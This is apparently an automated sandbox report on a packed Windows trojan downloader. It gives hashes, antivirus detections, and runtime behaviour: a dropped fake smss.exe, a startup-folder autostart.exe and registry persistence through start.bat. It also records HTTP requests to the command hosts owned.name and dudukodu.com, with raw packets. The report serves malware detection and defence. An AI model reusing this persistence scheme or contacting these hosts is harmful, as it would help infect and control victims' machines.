Analysis Date2014-11-22 05:17:10
MD5a7ef7f874e530d7963f1597f78a6d104
SHA1195523b1000372e00a1056db9276a160e16ba4eb

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
SectionCODE md5: 441f24d0349a6f1a0830a89894985424 sha1: 937b647b0c788036de127b7af25659b9375703f6 size: 13312
SectionDATA md5: 303a210367d2fe1ce63e8acc4e729f14 sha1: 52489ea9038455ab323866842544011c1bb2241e size: 512
SectionBSS md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section.idata md5: 5ea90bc071e9e1fbe9464b0fd49a9503 sha1: 1f80ec9ba657c6b1c49060e98a26c05beca1ff25 size: 1024
Section.tls md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section.rdata md5: 70264c7928189ef43fed5ba6df6cefe0 sha1: 2fbedc4b5c40b064230d92c68d3117c82184b197 size: 512
Section.reloc md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section.rsrc md5: ba5bb27faf1daee1f2fb9735f38f5a43 sha1: 372d50e9160eda014b60a8b22cd15f8df8d1f2ab size: 512
Section.aspack md5: e64e46706c851a9321a4f2986012df2e sha1: 92912fdaf1b319b400bba546eab5ab427a75baec size: 4608
Section.adata md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Timestamp1992-06-19 22:22:17
PackerASPack v2.1
PEhash45f8ce11756b34ed9e1a5a214b0a15a907f2aa17
IMPhashd0119413a236d23e96780b2c2a383829
AV360 SafeGeneric.Malware.SF.67F5ECA8
AVAd-AwareGeneric.Malware.SF.67F5ECA8
AVAlwil (avast)Trojan-gen:Win32:Trojan-gen
AVArcabit (arcavir)Downloader.Agent.Euy
AVAuthentiumW32/PWS.PVMV-8628
AVAvira (antivir)TR/Dldr.Delphi.Gen
AVBullGuardGeneric.Malware.SF.67F5ECA8
AVCA (E-Trust Ino)Win32/SillyDl.EJF
AVCAT (quickheal)TrojanDownloader.Agent.euy.na
AVClamAVTrojan.Downloader-16241
AVDr. WebTrojan.MulDrop.11401
AVEmsisoftGeneric.Malware.SF.67F5ECA8
AVEset (nod32)Win32/TrojanDownloader.Delf.OYJ
AVFortinetW32/Agent.EFF!tr
AVFrisk (f-prot)W32/Pws.AHGP
AVF-SecureGeneric.Malware.SF.67F5ECA8
AVGrisoft (avg)Downloader.Agent2.AHGD
AVIkarusTrojan-Dropper.Agent
AVK7Trojan ( 7000000f1 )
AVKasperskyTrojan-Dropper.Win32.Parsi.ly
AVMalwareBytesno_virus
AVMcafeeGeneric.dx
AVMicrosoft Security EssentialsTrojanDownloader:Win32/Tsunovest.A
AVMicroWorld (escan)Generic.Malware.SF.67F5ECA8
AVRisingTrojan.DL.Win32.Agent.euy
AVSophosTroj/DwnLdr-HSK
AVSymantecDownloader
AVTrend MicroTROJ_FAM2f1.TOMA
AVVirusBlokAda (vba32)TrojanDropper.Parsi

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Program Files\Common Files\System\smss.exe
Creates ProcessC:\Program Files\Common Files\System\smss.exe

Process
↳ C:\Program Files\Common Files\System\smss.exe

Creates File\Device\Afd\Endpoint
Creates FileC:\Program Files\Common Files\System\start.bat
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Startup\autostart.exe
Creates ProcessREGEDIT /S "C:\Program Files\Common Files\System\start.bat"
Creates MutexTsunamiOverHost

Process
↳ REGEDIT /S "C:\Program Files\Common Files\System\start.bat"

Network Details:

DNSowned.name
Type: A
204.236.239.5
DNSdudukodu.com
Type: A
198.98.119.40
DNSwww.dudukodu.com
Type: A
HTTP GEThttp://owned.name/exceptions
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP GEThttp://www.dudukodu.com/pegasus/update.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP192.168.1.1:1031 ➝ 204.236.239.5:80
Flows TCP192.168.1.1:1032 ➝ 198.98.119.40:80

Raw Pcap
0x00000000 (00000)   47455420 2f657863 65707469 6f6e7320   GET /exceptions 
0x00000010 (00016)   48545450 2f312e30 0d0a4163 63657074   HTTP/1.0..Accept
0x00000020 (00032)   3a202a2f 2a0d0a41 63636570 742d4c61   : */*..Accept-La
0x00000030 (00048)   6e677561 67653a20 706c2c65 6e2d7573   nguage: pl,en-us
0x00000040 (00064)   3b713d30 2e372c65 6e3b713d 302e330d   ;q=0.7,en;q=0.3.
0x00000050 (00080)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000060 (00096)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000070 (00112)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000080 (00128)   57696e64 6f777320 4e542035 2e31290d   Windows NT 5.1).
0x00000090 (00144)   0a486f73 743a206f 776e6564 2e6e616d   .Host: owned.nam
0x000000a0 (00160)   650d0a43 6f6e6e65 6374696f 6e3a2063   e..Connection: c
0x000000b0 (00176)   6c6f7365 0d0a0d0a                     lose....

0x00000000 (00000)   47455420 2f706567 61737573 2f757064   GET /pegasus/upd
0x00000010 (00016)   6174652e 70687020 48545450 2f312e30   ate.php HTTP/1.0
0x00000020 (00032)   0d0a4163 63657074 3a202a2f 2a0d0a41   ..Accept: */*..A
0x00000030 (00048)   63636570 742d4c61 6e677561 67653a20   ccept-Language: 
0x00000040 (00064)   706c2c65 6e2d7573 3b713d30 2e372c65   pl,en-us;q=0.7,e
0x00000050 (00080)   6e3b713d 302e330d 0a557365 722d4167   n;q=0.3..User-Ag
0x00000060 (00096)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000070 (00112)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000080 (00128)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000090 (00144)   4e542035 2e31290d 0a486f73 743a2077   NT 5.1)..Host: w
0x000000a0 (00160)   77772e64 7564756b 6f64752e 636f6d0d   ww.dudukodu.com.
0x000000b0 (00176)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x000000c0 (00192)   73650d0a 0d0a                         se....


Strings
.

DVCLAL
PACKAGEINFO
 (08@P`p
+1R@zI
2Q Q533
4)wVZI
6;$iZ	
70i]`us
8;<d>_
.adata
advapi32.dll
.aspack
A.XB*D]J*]
b|e%-I
`b.Hu=
bY{@s!~
cUaDVH
ERAN'qNQ
ExitProcess
GetKeyboardType
GetModuleHandleA
GetProcAddress
g[,guzKg
http://www.dudukodu.com/pegasus#
i 5&$+
icmp.dll
IcmpSendEcho
.idata
kernel32.dll
K	rAyXvL'$V
LOADER ERROR
LoadLibraryA
+m2 :"
MessageBoxA
M?rnMI
nDjL.=
oleaut32.dll
<ou4IO
< q$5W$
.rdata
RegQueryValueExA
.reloc
shell32.dll
SHGetSpecialFolderPathA
SysFreeString
The ordinal %u could not be located in the dynamic link library %s
The procedure entry point %s could not be located in the dynamic link library %s
This program must be run under Win32
tNs^DF
user32.dll
VirtualAlloc
VirtualFree
WSACleanup
wsock32.dll
wsprintfA
X[y	W_;
yIUc;^
y+zw$I
zjlmo'?